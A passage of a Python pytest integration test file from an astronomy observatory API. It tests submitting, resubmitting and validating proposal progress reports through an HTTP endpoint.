"description_of_observing_constraints": 'Thin/thick cloud and 2-3" seeing.',
"change_reason": "N/A",
"summary_of_proposal_status": "See attached.",
"strategy_changes": "None",
"partner_requested_percentages": "invalid",
}
username = find_username("administrator")
authenticate(username, client)
response = client.put(
PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=data
)
assert response.status_code == status.HTTP_400_BAD_REQUEST
def test_submit_progress_report(
check_data: Callable[[Any], None],
client: TestClient,
tmp_path: pathlib.Path,
monkeypatch: pytest.MonkeyPatch,
) -> None:
proposal_code = "2018-2-SCI-020"
_prepare_settings_and_summary(proposal_code, tmp_path, monkeypatch)
data = {
"requested_time": 4200,
"maximum_seeing": 2,
"transparency": "Thin cloud",
"description_of_observing_constraints": 'Thin/thick cloud and 2-3" seeing.',
"change_reason": "N/A",
"summary_of_proposal_status": "See attached.",
"strategy_changes": "None",
"partner_requested_percentages": "RSA:100;UKSC:0;RU:0",
}
username = find_username("administrator")
authenticate(username, client)
response = client.put(
PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=data
)
assert response.status_code == status.HTTP_200_OK
response = client.get(PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2")
assert response.status_code == status.HTTP_200_OK
response_data = response.json()
# The filename changes with every test run
del response_data["proposal_progress_pdf"]
check_data(response_data)
def test_submit_progress_report_repeatedly(
check_data: Callable[[Any], None],
client: TestClient,
tmp_path: pathlib.Path,
monkeypatch: pytest.MonkeyPatch,
) -> None:
proposal_code = "2018-2-SCI-020"
_prepare_settings_and_summary(proposal_code, tmp_path, monkeypatch)
data = {
"requested_time": 4200,
"maximum_seeing": 2,
"transparency": "Thin cloud",
"description_of_observing_constraints": 'Thin/thick cloud and 2-3" seeing.',
"change_reason": "N/A",
"summary_of_proposal_status": "See attached.",
"strategy_changes": "None",
"partner_requested_percentages": "RSA:100;UKSC:0;RU:0",
}
username = find_username("administrator")
authenticate(username, client)
response = client.put(
PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=data
)
assert response.status_code == status.HTTP_200_OK
response = client.get(PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2")
first_response_data = response.json()
# The filename changes with every test run
del first_response_data["proposal_progress_pdf"]
# Submitting a progress report is idempotent.
response = client.put(
PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=data
)
assert response.status_code == status.HTTP_200_OK
response = client.get(PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2")
second_response_data = response.json()
assert response.status_code == status.HTTP_200_OK
del second_response_data["proposal_progress_pdf"]
assert second_response_data == first_response_data
# Resubmitting with different data updates the request
updated_data = {
"requested_time": 11000,
"maximum_seeing": 3,
"transparency": "Thick cloud",
"description_of_observing_constraints": 'Thick cloud and 3" seeing.',
"change_reason": "Previous data suggests the conditions may be relaxed.",
"summary_of_proposal_status": "All going well.",
"strategy_changes": (
"Relax the observing conditions to increase the observation probability."
),
"partner_requested_percentages": "RSA:33;UKSC:3;RU:64",
}
response = client.put(
PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2", data=updated_data
)
assert response.status_code == status.HTTP_200_OK
response = client.get(PROGRESS_REPORT_URL + "/" + proposal_code + "/2020-2")
third_response_data = response.json()
del third_response_data["proposal_progress_pdf"]
assert response.status_code == status.HTTP_200_OK
assert third_response_data != first_response_data
check_data(third_response_data)
| saltastroops/salt-api | tests/integration/progress_report/test_submit_progress_report.py | test_submit_progress_report.py | py | 5,922 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pathlib.Path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "pytest.MonkeyPatch",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "typing.NamedTuple",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "pathlib.P... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.